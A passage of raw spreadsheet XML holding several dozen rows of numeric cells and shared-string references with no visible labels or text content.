      <c r="E27210" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27210" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="27211" ht="15.75" customHeight="1">
      <c r="A27211" s="1">
        <v>14200.0</v>
      </c>
      <c r="B27211" s="2">
        <v>3.8233099E7</v>
      </c>
      <c r="C27211" s="2" t="s">
        <v>26148</v>
      </c>
      <c r="D27211" s="2">
        <v>1.0</v>
      </c>
      <c r="E27211" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27211" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="27212" ht="15.75" customHeight="1">
      <c r="A27212" s="1">
        <v>16747.0</v>
      </c>
      <c r="B27212" s="2">
        <v>4.7585772E7</v>
      </c>
      <c r="C27212" s="2" t="s">
        <v>26149</v>
      </c>
      <c r="D27212" s="2">
        <v>1.0</v>
      </c>
      <c r="E27212" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27212" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="27213" ht="15.75" customHeight="1">
      <c r="A27213" s="1">
        <v>21360.0</v>
      </c>
      <c r="B27213" s="2">
        <v>2.1443385E7</v>
      </c>
      <c r="C27213" s="2" t="s">
        <v>26150</v>
      </c>
      <c r="D27213" s="2">
        <v>1.0</v>
      </c>
      <c r="E27213" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27213" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="27214" ht="15.75" customHeight="1">
      <c r="A27214" s="1">
        <v>30663.0</v>
      </c>
      <c r="B27214" s="2">
        <v>4.2153344E7</v>
      </c>
      <c r="C27214" s="2" t="s">
        <v>26151</v>
      </c>
      <c r="D27214" s="2">
        <v>1.0</v>
      </c>
      <c r="E27214" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27214" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="27215" ht="15.75" customHeight="1">
      <c r="A27215" s="1">
        <v>32276.0</v>
      </c>
      <c r="B27215" s="2">
        <v>5.5321234E7</v>
      </c>
      <c r="C27215" s="2" t="s">
        <v>26152</v>
      </c>
      <c r="D27215" s="2">
        <v>1.0</v>
      </c>
      <c r="E27215" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27215" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="27216" ht="15.75" customHeight="1">
      <c r="A27216" s="1">
        <v>8881.0</v>
      </c>
      <c r="B27216" s="2">
        <v>5.4776386E7</v>
      </c>
      <c r="C27216" s="2" t="s">
        <v>26153</v>
      </c>
      <c r="D27216" s="2">
        <v>1.0</v>
      </c>
      <c r="E27216" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27216" s="2">
        <v>0.1016771488469602</v>
      </c>
    </row>
    <row r="27217" ht="15.75" customHeight="1">
      <c r="A27217" s="1">
        <v>19632.0</v>
      </c>
      <c r="B27217" s="2">
        <v>5.6278179E7</v>
      </c>
      <c r="C27217" s="2" t="s">
        <v>26154</v>
      </c>
      <c r="D27217" s="2">
        <v>1.0</v>
      </c>
      <c r="E27217" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27217" s="2">
        <v>0.1016771488469602</v>
      </c>
    </row>
    <row r="27218" ht="15.75" customHeight="1">
      <c r="A27218" s="1">
        <v>30703.0</v>
      </c>
      <c r="B27218" s="2">
        <v>4262120.0</v>
      </c>
      <c r="C27218" s="2" t="s">
        <v>26155</v>
      </c>
      <c r="D27218" s="2">
        <v>1.0</v>
      </c>
      <c r="E27218" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27218" s="2">
        <v>0.1016771488469602</v>
      </c>
    </row>
    <row r="27219" ht="15.75" customHeight="1">
      <c r="A27219" s="1">
        <v>33362.0</v>
      </c>
      <c r="B27219" s="2">
        <v>7632037.0</v>
      </c>
      <c r="C27219" s="2" t="s">
        <v>26156</v>
      </c>
      <c r="D27219" s="2">
        <v>1.0</v>
      </c>
      <c r="E27219" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27219" s="2">
        <v>0.1016771488469602</v>
      </c>
    </row>
    <row r="27220" ht="15.75" customHeight="1">
      <c r="A27220" s="1">
        <v>1536.0</v>
      </c>
      <c r="B27220" s="2">
        <v>2.7536254E7</v>
      </c>
      <c r="C27220" s="2" t="s">
        <v>26157</v>
      </c>
      <c r="D27220" s="2">
        <v>1.0</v>
      </c>
      <c r="E27220" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27220" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="27221" ht="15.75" customHeight="1">
      <c r="A27221" s="1">
        <v>16293.0</v>
      </c>
      <c r="B27221" s="2">
        <v>4.5829346E7</v>
      </c>
      <c r="C27221" s="2" t="s">
        <v>26158</v>
      </c>
      <c r="D27221" s="2">
        <v>1.0</v>
      </c>
      <c r="E27221" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27221" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="27222" ht="15.75" customHeight="1">
      <c r="A27222" s="1">
        <v>21615.0</v>
      </c>
      <c r="B27222" s="2">
        <v>2.4538134E7</v>
      </c>
      <c r="C27222" s="2" t="s">
        <v>26159</v>
      </c>
      <c r="D27222" s="2">
        <v>1.0</v>
      </c>
      <c r="E27222" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27222" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="27223" ht="15.75" customHeight="1">
      <c r="A27223" s="1">
        <v>7990.0</v>
      </c>
      <c r="B27223" s="2">
        <v>5.2751103E7</v>
      </c>
      <c r="C27223" s="2" t="s">
        <v>26160</v>
      </c>
      <c r="D27223" s="2">
        <v>1.0</v>
      </c>
      <c r="E27223" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27223" s="2">
        <v>0.1015625</v>
      </c>
    </row>
    <row r="27224" ht="15.75" customHeight="1">
      <c r="A27224" s="1">
        <v>15253.0</v>
      </c>
      <c r="B27224" s="2">
        <v>4.2299966E7</v>
      </c>
      <c r="C27224" s="2" t="s">
        <v>26161</v>
      </c>
      <c r="D27224" s="2">
        <v>1.0</v>
      </c>
      <c r="E27224" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27224" s="2">
        <v>0.1015625</v>
      </c>
    </row>
    <row r="27225" ht="15.75" customHeight="1">
      <c r="A27225" s="1">
        <v>11407.0</v>
      </c>
      <c r="B27225" s="2">
        <v>2.163886E7</v>
      </c>
      <c r="C27225" s="2" t="s">
        <v>26162</v>
      </c>
      <c r="D27225" s="2">
        <v>1.0</v>
      </c>
      <c r="E27225" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27225" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="27226" ht="15.75" customHeight="1">
      <c r="A27226" s="1">
        <v>11759.0</v>
      </c>
      <c r="B27226" s="2">
        <v>2.4174218E7</v>
      </c>
      <c r="C27226" s="2" t="s">
        <v>26163</v>
      </c>
      <c r="D27226" s="2">
        <v>1.0</v>
      </c>
      <c r="E27226" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27226" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="27227" ht="15.75" customHeight="1">
      <c r="A27227" s="1">
        <v>13085.0</v>
      </c>
      <c r="B27227" s="2">
        <v>3.3365097E7</v>
      </c>
      <c r="C27227" s="2" t="s">
        <v>26164</v>
      </c>
      <c r="D27227" s="2">
        <v>1.0</v>
      </c>
      <c r="E27227" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27227" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="27228" ht="15.75" customHeight="1">
      <c r="A27228" s="1">
        <v>24276.0</v>
      </c>
      <c r="B27228" s="2">
        <v>1.0541384E7</v>
      </c>
      <c r="C27228" s="2" t="s">
        <v>26165</v>
      </c>
      <c r="D27228" s="2">
        <v>1.0</v>
      </c>
      <c r="E27228" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27228" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="27229" ht="15.75" customHeight="1">
      <c r="A27229" s="1">
        <v>30911.0</v>
      </c>
      <c r="B27229" s="2">
        <v>4.677977E7</v>
      </c>
      <c r="C27229" s="2" t="s">
        <v>26166</v>
      </c>
      <c r="D27229" s="2">
        <v>1.0</v>
      </c>
      <c r="E27229" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27229" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="27230" ht="15.75" customHeight="1">
      <c r="A27230" s="1">
        <v>137.0</v>
      </c>
      <c r="B27230" s="2">
        <v>1.3493723E7</v>
      </c>
      <c r="C27230" s="2" t="s">
        <v>26167</v>
      </c>
      <c r="D27230" s="2">
        <v>1.0</v>
      </c>
      <c r="E27230" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27230" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27231" ht="15.75" customHeight="1">
      <c r="A27231" s="1">
        <v>159.0</v>
      </c>
      <c r="B27231" s="2">
        <v>1.3750599E7</v>
      </c>
      <c r="C27231" s="2" t="s">
        <v>26168</v>
      </c>
      <c r="D27231" s="2">
        <v>1.0</v>
      </c>
      <c r="E27231" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27231" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27232" ht="15.75" customHeight="1">
      <c r="A27232" s="1">
        <v>833.0</v>
      </c>
      <c r="B27232" s="2">
        <v>2.1578852E7</v>
      </c>
      <c r="C27232" s="2" t="s">
        <v>26169</v>
      </c>
      <c r="D27232" s="2">
        <v>1.0</v>
      </c>
      <c r="E27232" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27232" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27233" ht="15.75" customHeight="1">
      <c r="A27233" s="1">
        <v>968.0</v>
      </c>
      <c r="B27233" s="2">
        <v>2.2748309E7</v>
      </c>
      <c r="C27233" s="2" t="s">
        <v>26170</v>
      </c>
      <c r="D27233" s="2">
        <v>1.0</v>
      </c>
      <c r="E27233" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27233" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27234" ht="15.75" customHeight="1">
      <c r="A27234" s="1">
        <v>1051.0</v>
      </c>
      <c r="B27234" s="2">
        <v>2.3415242E7</v>
      </c>
      <c r="C27234" s="2" t="s">
        <v>26171</v>
      </c>
      <c r="D27234" s="2">
        <v>1.0</v>
      </c>
      <c r="E27234" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27234" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27235" ht="15.75" customHeight="1">
      <c r="A27235" s="1">
        <v>1112.0</v>
      </c>
      <c r="B27235" s="2">
        <v>2.405179E7</v>
      </c>
      <c r="C27235" s="2" t="s">
        <v>26172</v>
      </c>
      <c r="D27235" s="2">
        <v>1.0</v>
      </c>
      <c r="E27235" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27235" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27236" ht="15.75" customHeight="1">
      <c r="A27236" s="1">
        <v>1333.0</v>
      </c>
      <c r="B27236" s="2">
        <v>2.5831884E7</v>
      </c>
      <c r="C27236" s="2" t="s">
        <v>26173</v>
      </c>
      <c r="D27236" s="2">
        <v>1.0</v>
      </c>
      <c r="E27236" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27236" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27237" ht="15.75" customHeight="1">
      <c r="A27237" s="1">
        <v>1428.0</v>
      </c>
      <c r="B27237" s="2">
        <v>2.6608276E7</v>
      </c>
      <c r="C27237" s="2" t="s">
        <v>26174</v>
      </c>
      <c r="D27237" s="2">
        <v>1.0</v>
      </c>
      <c r="E27237" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27237" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27238" ht="15.75" customHeight="1">
      <c r="A27238" s="1">
        <v>1434.0</v>
      </c>
      <c r="B27238" s="2">
        <v>2.6654568E7</v>
      </c>
      <c r="C27238" s="2" t="s">
        <v>26175</v>
      </c>
      <c r="D27238" s="2">
        <v>1.0</v>
      </c>
      <c r="E27238" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27238" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27239" ht="15.75" customHeight="1">
      <c r="A27239" s="1">
        <v>1514.0</v>
      </c>
      <c r="B27239" s="2">
        <v>2.7322771E7</v>
      </c>
      <c r="C27239" s="2" t="s">
        <v>26176</v>
      </c>
      <c r="D27239" s="2">
        <v>1.0</v>
      </c>
      <c r="E27239" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27239" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27240" ht="15.75" customHeight="1">
      <c r="A27240" s="1">
        <v>1595.0</v>
      </c>
      <c r="B27240" s="2">
        <v>2.7764932E7</v>
      </c>
      <c r="C27240" s="2" t="s">
        <v>26177</v>
      </c>
      <c r="D27240" s="2">
        <v>1.0</v>
      </c>
      <c r="E27240" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27240" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27241" ht="15.75" customHeight="1">
      <c r="A27241" s="1">
        <v>1718.0</v>
      </c>
      <c r="B27241" s="2">
        <v>2.8646661E7</v>
      </c>
      <c r="C27241" s="2" t="s">
        <v>26178</v>
      </c>
      <c r="D27241" s="2">
        <v>1.0</v>
      </c>
      <c r="E27241" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27241" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27242" ht="15.75" customHeight="1">
      <c r="A27242" s="1">
        <v>1927.0</v>
      </c>
      <c r="B27242" s="2">
        <v>3.0102383E7</v>
      </c>
      <c r="C27242" s="2" t="s">
        <v>26179</v>
      </c>
      <c r="D27242" s="2">
        <v>1.0</v>
      </c>
      <c r="E27242" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27242" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27243" ht="15.75" customHeight="1">
      <c r="A27243" s="1">
        <v>1945.0</v>
      </c>
      <c r="B27243" s="2">
        <v>3.0217567E7</v>
      </c>
      <c r="C27243" s="2" t="s">
        <v>26180</v>
      </c>
      <c r="D27243" s="2">
        <v>1.0</v>
      </c>
      <c r="E27243" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27243" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27244" ht="15.75" customHeight="1">
      <c r="A27244" s="1">
        <v>1952.0</v>
      </c>
      <c r="B27244" s="2">
        <v>3.0253654E7</v>
      </c>
      <c r="C27244" s="2" t="s">
        <v>26181</v>
      </c>
      <c r="D27244" s="2">
        <v>1.0</v>
      </c>
      <c r="E27244" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27244" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27245" ht="15.75" customHeight="1">
      <c r="A27245" s="1">
        <v>2034.0</v>
      </c>
      <c r="B27245" s="2">
        <v>3.0859633E7</v>
      </c>
      <c r="C27245" s="2" t="s">
        <v>26182</v>
      </c>
      <c r="D27245" s="2">
        <v>1.0</v>
      </c>
      <c r="E27245" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27245" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27246" ht="15.75" customHeight="1">
      <c r="A27246" s="1">
        <v>2130.0</v>
      </c>
      <c r="B27246" s="2">
        <v>3.1459953E7</v>
      </c>
      <c r="C27246" s="2" t="s">
        <v>26183</v>
      </c>
      <c r="D27246" s="2">
        <v>1.0</v>
      </c>
      <c r="E27246" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27246" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27247" ht="15.75" customHeight="1">
      <c r="A27247" s="1">
        <v>2740.0</v>
      </c>
      <c r="B27247" s="2">
        <v>3.5016098E7</v>
      </c>
      <c r="C27247" s="2" t="s">
        <v>26184</v>
      </c>
      <c r="D27247" s="2">
        <v>1.0</v>
      </c>
      <c r="E27247" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27247" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27248" ht="15.75" customHeight="1">
      <c r="A27248" s="1">
        <v>3406.0</v>
      </c>
      <c r="B27248" s="2">
        <v>3.8037684E7</v>
      </c>
      <c r="C27248" s="2" t="s">
        <v>26185</v>
      </c>
      <c r="D27248" s="2">
        <v>1.0</v>
      </c>
      <c r="E27248" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27248" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27249" ht="15.75" customHeight="1">
      <c r="A27249" s="1">
        <v>3615.0</v>
      </c>
      <c r="B27249" s="2">
        <v>3.9173616E7</v>
      </c>
      <c r="C27249" s="2" t="s">
        <v>26186</v>
      </c>
      <c r="D27249" s="2">
        <v>1.0</v>
      </c>
      <c r="E27249" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27249" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27250" ht="15.75" customHeight="1">
      <c r="A27250" s="1">
        <v>3751.0</v>
      </c>
      <c r="B27250" s="2">
        <v>3.9710973E7</v>
      </c>
      <c r="C27250" s="2" t="s">
        <v>26187</v>
      </c>
      <c r="D27250" s="2">
        <v>1.0</v>
      </c>
      <c r="E27250" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27250" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27251" ht="15.75" customHeight="1">
      <c r="A27251" s="1">
        <v>4160.0</v>
      </c>
      <c r="B27251" s="2">
        <v>4.1517759E7</v>
      </c>
      <c r="C27251" s="2" t="s">
        <v>26188</v>
      </c>
      <c r="D27251" s="2">
        <v>1.0</v>
      </c>
      <c r="E27251" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27251" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27252" ht="15.75" customHeight="1">
      <c r="A27252" s="1">
        <v>4273.0</v>
      </c>
      <c r="B27252" s="2">
        <v>4.1874577E7</v>
      </c>
      <c r="C27252" s="2" t="s">
        <v>26189</v>
      </c>
      <c r="D27252" s="2">
        <v>1.0</v>
      </c>
      <c r="E27252" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27252" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27253" ht="15.75" customHeight="1">
      <c r="A27253" s="1">
        <v>4291.0</v>
      </c>
      <c r="B27253" s="2">
        <v>4.1907989E7</v>
      </c>
      <c r="C27253" s="2" t="s">
        <v>26190</v>
      </c>
      <c r="D27253" s="2">
        <v>1.0</v>
      </c>
      <c r="E27253" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27253" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27254" ht="15.75" customHeight="1">
      <c r="A27254" s="1">
        <v>4335.0</v>
      </c>
      <c r="B27254" s="2">
        <v>4.2059602E7</v>
      </c>
      <c r="C27254" s="2" t="s">
        <v>26191</v>
      </c>
      <c r="D27254" s="2">
        <v>1.0</v>
      </c>
      <c r="E27254" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27254" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27255" ht="15.75" customHeight="1">
      <c r="A27255" s="1">
        <v>4627.0</v>
      </c>
      <c r="B27255" s="2">
        <v>4.2980996E7</v>
      </c>
      <c r="C27255" s="2" t="s">
        <v>26192</v>
      </c>
      <c r="D27255" s="2">
        <v>1.0</v>
      </c>
      <c r="E27255" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27255" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27256" ht="15.75" customHeight="1">
      <c r="A27256" s="1">
        <v>5191.0</v>
      </c>
      <c r="B27256" s="2">
        <v>4.479333E7</v>
      </c>
      <c r="C27256" s="2" t="s">
        <v>26193</v>
      </c>
      <c r="D27256" s="2">
        <v>1.0</v>
      </c>
      <c r="E27256" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27256" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27257" ht="15.75" customHeight="1">
      <c r="A27257" s="1">
        <v>5355.0</v>
      </c>
      <c r="B27257" s="2">
        <v>4.536738E7</v>
      </c>
      <c r="C27257" s="2" t="s">
        <v>26194</v>
      </c>
      <c r="D27257" s="2">
        <v>1.0</v>
      </c>
      <c r="E27257" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27257" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27258" ht="15.75" customHeight="1">
      <c r="A27258" s="1">
        <v>5458.0</v>
      </c>
      <c r="B27258" s="2">
        <v>4.5659874E7</v>
      </c>
      <c r="C27258" s="2" t="s">
        <v>26195</v>
      </c>
      <c r="D27258" s="2">
        <v>1.0</v>
      </c>
      <c r="E27258" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27258" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27259" ht="15.75" customHeight="1">
      <c r="A27259" s="1">
        <v>6037.0</v>
      </c>
      <c r="B27259" s="2">
        <v>4.7585616E7</v>
      </c>
      <c r="C27259" s="2" t="s">
        <v>26196</v>
      </c>
      <c r="D27259" s="2">
        <v>1.0</v>
      </c>
      <c r="E27259" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27259" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27260" ht="15.75" customHeight="1">
      <c r="A27260" s="1">
        <v>6293.0</v>
      </c>
      <c r="B27260" s="2">
        <v>4.8211548E7</v>
      </c>
      <c r="C27260" s="2" t="s">
        <v>26197</v>
      </c>
      <c r="D27260" s="2">
        <v>1.0</v>
      </c>
      <c r="E27260" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27260" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27261" ht="15.75" customHeight="1">
      <c r="A27261" s="1">
        <v>6380.0</v>
      </c>
      <c r="B27261" s="2">
        <v>4.8414311E7</v>
      </c>
      <c r="C27261" s="2" t="s">
        <v>26198</v>
      </c>
      <c r="D27261" s="2">
        <v>1.0</v>
      </c>
      <c r="E27261" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27261" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27262" ht="15.75" customHeight="1">
      <c r="A27262" s="1">
        <v>6871.0</v>
      </c>
      <c r="B27262" s="2">
        <v>4.9691065E7</v>
      </c>
      <c r="C27262" s="2" t="s">
        <v>26199</v>
      </c>
      <c r="D27262" s="2">
        <v>1.0</v>
      </c>
      <c r="E27262" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27262" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27263" ht="15.75" customHeight="1">
      <c r="A27263" s="1">
        <v>6954.0</v>
      </c>
      <c r="B27263" s="2">
        <v>4.9973199E7</v>
      </c>
      <c r="C27263" s="2" t="s">
        <v>26200</v>
      </c>
      <c r="D27263" s="2">
        <v>1.0</v>
      </c>
      <c r="E27263" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27263" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27264" ht="15.75" customHeight="1">
      <c r="A27264" s="1">
        <v>6989.0</v>
      </c>
      <c r="B27264" s="2">
        <v>5.0067062E7</v>
      </c>
      <c r="C27264" s="2" t="s">
        <v>26201</v>
      </c>
      <c r="D27264" s="2">
        <v>1.0</v>
      </c>
      <c r="E27264" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27264" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27265" ht="15.75" customHeight="1">
      <c r="A27265" s="1">
        <v>7044.0</v>
      </c>
      <c r="B27265" s="2">
        <v>5.0144401E7</v>
      </c>
      <c r="C27265" s="2" t="s">
        <v>26202</v>
      </c>
      <c r="D27265" s="2">
        <v>1.0</v>
      </c>
      <c r="E27265" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27265" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27266" ht="15.75" customHeight="1">
      <c r="A27266" s="1">
        <v>7185.0</v>
      </c>
      <c r="B27266" s="2">
        <v>5.0564107E7</v>
      </c>
      <c r="C27266" s="2" t="s">
        <v>26203</v>
      </c>
      <c r="D27266" s="2">
        <v>1.0</v>
      </c>
      <c r="E27266" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27266" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27267" ht="15.75" customHeight="1">
      <c r="A27267" s="1">
        <v>7255.0</v>
      </c>
      <c r="B27267" s="2">
        <v>5.0729443E7</v>
      </c>
      <c r="C27267" s="2" t="s">
        <v>26204</v>
      </c>
      <c r="D27267" s="2">
        <v>1.0</v>
      </c>
      <c r="E27267" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27267" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27268" ht="15.75" customHeight="1">
      <c r="A27268" s="1">
        <v>7802.0</v>
      </c>
      <c r="B27268" s="2">
        <v>5.220815E7</v>
      </c>
      <c r="C27268" s="2" t="s">
        <v>26205</v>
      </c>
      <c r="D27268" s="2">
        <v>1.0</v>
      </c>
      <c r="E27268" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27268" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27269" ht="15.75" customHeight="1">
      <c r="A27269" s="1">
        <v>7903.0</v>
      </c>
      <c r="B27269" s="2">
        <v>5.2484636E7</v>
      </c>
      <c r="C27269" s="2" t="s">
        <v>26206</v>
      </c>
      <c r="D27269" s="2">
        <v>1.0</v>
      </c>
      <c r="E27269" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27269" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27270" ht="15.75" customHeight="1">
      <c r="A27270" s="1">
        <v>7998.0</v>
      </c>
      <c r="B27270" s="2">
        <v>5.2777186E7</v>
      </c>
      <c r="C27270" s="2" t="s">
        <v>26207</v>
      </c>
      <c r="D27270" s="2">
        <v>1.0</v>
      </c>
      <c r="E27270" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27270" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27271" ht="15.75" customHeight="1">
      <c r="A27271" s="1">
        <v>8187.0</v>
      </c>
      <c r="B27271" s="2">
        <v>5.3250492E7</v>
      </c>
      <c r="C27271" s="2" t="s">
        <v>26208</v>
      </c>
      <c r="D27271" s="2">
        <v>1.0</v>
      </c>
      <c r="E27271" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27271" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27272" ht="15.75" customHeight="1">
      <c r="A27272" s="1">
        <v>8296.0</v>
      </c>
      <c r="B27272" s="2">
        <v>5.3531833E7</v>
      </c>
      <c r="C27272" s="2" t="s">
        <v>26209</v>
      </c>
      <c r="D27272" s="2">
        <v>1.0</v>
      </c>
      <c r="E27272" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27272" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27273" ht="15.75" customHeight="1">
      <c r="A27273" s="1">
        <v>9009.0</v>
      </c>
      <c r="B27273" s="2">
        <v>5.4980251E7</v>
      </c>
      <c r="C27273" s="2" t="s">
        <v>26210</v>
      </c>
      <c r="D27273" s="2">
        <v>1.0</v>
      </c>
      <c r="E27273" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27273" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27274" ht="15.75" customHeight="1">
      <c r="A27274" s="1">
        <v>9075.0</v>
      </c>
      <c r="B27274" s="2">
        <v>5.5121804E7</v>
      </c>
      <c r="C27274" s="2" t="s">
        <v>26211</v>
      </c>
      <c r="D27274" s="2">
        <v>1.0</v>
      </c>
      <c r="E27274" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27274" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27275" ht="15.75" customHeight="1">
      <c r="A27275" s="1">
        <v>9314.0</v>
      </c>
      <c r="B27275" s="2">
        <v>5.5575277E7</v>
      </c>
      <c r="C27275" s="2" t="s">
        <v>26212</v>
      </c>
      <c r="D27275" s="2">
        <v>1.0</v>
      </c>
      <c r="E27275" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27275" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27276" ht="15.75" customHeight="1">
      <c r="A27276" s="1">
        <v>9480.0</v>
      </c>
      <c r="B27276" s="2">
        <v>5.5888792E7</v>
      </c>
      <c r="C27276" s="2" t="s">
        <v>26213</v>
      </c>
      <c r="D27276" s="2">
        <v>1.0</v>
      </c>
      <c r="E27276" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27276" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27277" ht="15.75" customHeight="1">
      <c r="A27277" s="1">
        <v>9528.0</v>
      </c>
      <c r="B27277" s="2">
        <v>5.5980269E7</v>
      </c>
      <c r="C27277" s="2" t="s">
        <v>26214</v>
      </c>
      <c r="D27277" s="2">
        <v>1.0</v>
      </c>
